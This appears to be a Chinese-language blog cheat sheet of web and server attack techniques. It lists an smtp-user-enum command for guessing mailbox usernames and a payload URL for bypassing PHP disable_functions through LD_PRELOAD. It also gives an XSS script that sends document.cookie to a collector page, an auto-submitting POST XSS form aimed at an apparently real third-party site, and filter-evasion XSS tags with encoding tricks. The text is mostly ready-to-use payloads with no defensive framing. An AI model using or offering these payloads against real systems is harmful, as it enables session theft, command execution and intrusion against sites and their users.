滲透特殊技巧一

goddemon發表於2020-11-09

①郵箱列舉

smtp-user-enum -M VRFY -U /root/Desktop/user.txt -t 192.168.1.107

-M: Method模式,選擇VRFY, EXPN以及RCPT方法猜解使用者名稱

-U: 使用者名稱字典檔案

-t: 執行smtp服務的主機


②繞shell時遇到函式禁用
工具


https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD

構造執行命令

**Payload:http://xxx/dp1.php?cmd=whoami&outpath=/tmp/xx&sopath=/xxx/dp1.so**

③xss獲取cookie值
利用重定向的方法獲取

<script>document.location = 'http://127.0.0.1/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>

④xss特殊玩法
post xss玩法
原始碼

<html>
<body>
<form  name="form" id="form1" method="post" action="http://www.ncufz.net/gkcx/searchzj.asp">
<input type="text" name="keywords" hidden="true" value='test"><sCRiPt sRC=></sCrIpT>'/>
</form>
<script>
document.getElementById('form1').submit();
</script>
</body>
</html>

注意在name地方處改這個頁面提交屬性的值
在action處提交到的頁面
在value處更改內容

不常見標籤

<style onload=alert(1) />
#典型發表留言處,姓名可利用這個繞
<body onpageshow=alert(1)>
#利用body標籤進行繞
<marquee behavior="alternate" onstart=alert(1)>hack the planet</marquee><marquee loop="1" onfinish=alert(1)>hack the planet</marquee><marquee onstart=alert(1)>hack the planet</marquee>
#Marquee 標籤

繞黑名單程式碼樣式
原因:JavaScript程式碼同義的各種動作都會被目標防護軟體列入黑名單,甚至是使用正常的alert也不例外
繞方法

如果編碼被過濾了

用 \u003c  來代替<  
<類符號被過濾了  可以轉實體編碼進行繞
\u003e換成原來的>
<img src=1 onerr\or=alert&#x28;1&#x29;>

常見的編碼繞

①實體編碼
②hex編碼
③base64編碼
④utf-8編碼

相關文章